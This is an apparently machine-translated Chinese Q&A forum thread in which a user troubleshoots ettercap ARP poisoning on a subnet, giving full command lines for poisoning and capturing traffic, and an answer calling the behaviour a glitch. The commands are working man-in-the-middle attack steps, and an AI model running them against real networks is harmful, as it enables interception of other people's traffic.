2013-08-27 182 views
1

我試圖運行運行ettercap如下:ettercap不掃描所有主機

sudo ettercap -i eth0 -Tq -M arp:remote,oneway -w out.data // /10.8.40.250/ 

但是ettercap只能夠2(有時1)主機添加到主機列表中。

Scanning the whole netmask for 8191 hosts... 
* |==================================================>| 100.00 % 

1 hosts added to the hosts list... 

ARP poisoning victims: 

GROUP 1 : ANY (all the hosts in the list) 

Starting Unified sniffing... 

Text only Interface activated... 
Hit 'h' for inline help 

爲什麼它只是印刷組1?

如果我試圖毒死一個特定的主機,

sudo ettercap -i eth0 -Tq -M arp:remote,oneway -w out.data /10.8.41.202/ /10.8.40.250/ 

它的工作原理!

我的IP:10.8.57.1​​21子網掩碼:255.255.224.0

我能前一段時間運行完全一樣的東西,加20-30主機和成功ARP毒藥其中的大多數。 我現在做錯了什麼?

回答

1

我寫了一篇關於Ettercap & SSLstrip在不久前的一篇文章。(http://bidabe.zapto.org/?p=17

你沒有做錯什麼,如果你再運行,再相同的命令行,你會發現,「組2 「顯得不正常。

在autoadd中使用交互模式,可以看到實時緩存中毒的所有主機(對於此子網)。 我認爲這是一個小故障。

enter image description here